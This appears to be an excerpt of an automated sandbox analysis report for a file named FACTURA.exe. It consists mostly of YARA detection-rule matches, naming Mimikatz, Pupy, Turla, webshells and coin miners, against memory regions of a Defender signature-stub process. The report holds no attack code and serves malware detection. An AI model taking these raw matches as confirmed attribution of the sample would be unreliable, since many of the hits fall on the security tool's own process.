Source: MpOAV.dll.45.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpUxAgent.dll.45.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll0.45.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll0.45.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\FACTURA.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\oobe\UserOOBEBroker.exe	Section loaded: edgegdi.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	Section loaded: edgegdi.dll

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe

File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdBoot.sys

Jump to behavior

Source: FACTURA.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 36.3.MpSigStub.exe.197a36f3b2a.205.unpack, type: UNPACKEDPE	Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a36f3b2a.205.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a359b15e.156.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a3f84db6.63.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a48b4c13.120.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 36.3.MpSigStub.exe.197a36f3b2a.148.unpack, type: UNPACKEDPE	Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a36f3b2a.148.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a364b8a5.203.raw.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a36f3b2a.205.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a4a13be1.134.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407e899.150.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407e899.150.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a359bd62.155.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a4a13be1.171.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4fa798e.184.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa798e.184.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a4dc49fa.86.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a364b8a5.181.raw.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a4f46966.113.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 36.3.MpSigStub.exe.197a3929e2b.149.unpack, type: UNPACKEDPE	Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 36.3.MpSigStub.exe.197a4df1a99.144.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a407d495.109.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407d495.109.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a39e033e.65.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a47aa096.53.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a47aa096.53.raw.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 36.3.MpSigStub.exe.197a4dc6bfe.187.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407d495.152.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407d495.152.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a47aa096.213.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a47aa096.213.raw.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 36.3.MpSigStub.exe.197a37e87d6.70.raw.unpack, type: UNPACKEDPE	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a407fe9d.151.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407fe9d.151.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack, type: UNPACKEDPE	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack, type: UNPACKEDPE	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack, type: UNPACKEDPE	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a3f2e43a.61.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a364dcf9.202.raw.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a4fa8d92.185.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa8d92.185.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a32a3acd.179.raw.unpack, type: UNPACKEDPE	Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a364dcf9.182.raw.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a44b5166.45.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a44b5166.45.raw.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a44b5166.45.raw.unpack, type: UNPACKEDPE	Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 36.3.MpSigStub.exe.197a44b5166.45.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE	Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4a13be1.209.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a3f2fc42.62.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a3f032fe.94.unpack, type: UNPACKEDPE	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack, type: UNPACKEDPE	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack, type: UNPACKEDPE	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack, type: UNPACKEDPE	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a3929e2b.210.unpack, type: UNPACKEDPE	Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 36.3.MpSigStub.exe.197a4c04b1a.11.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4c04b1a.11.raw.unpack, type: UNPACKEDPE	Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a36f3b2a.193.unpack, type: UNPACKEDPE	Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a36f3b2a.193.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a36f3b2a.193.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a3f032fe.94.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 36.3.MpSigStub.exe.197a48adbfa.121.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 36.3.MpSigStub.exe.197a48adbfa.121.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 36.3.MpSigStub.exe.197a48adbfa.121.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 36.3.MpSigStub.exe.197a4fa8d92.185.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a36f3b2a.215.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a359a55a.157.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a32a53a1.178.raw.unpack, type: UNPACKEDPE	Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack, type: UNPACKEDPE	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack, type: UNPACKEDPE	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack, type: UNPACKEDPE	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a36f3b2a.148.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
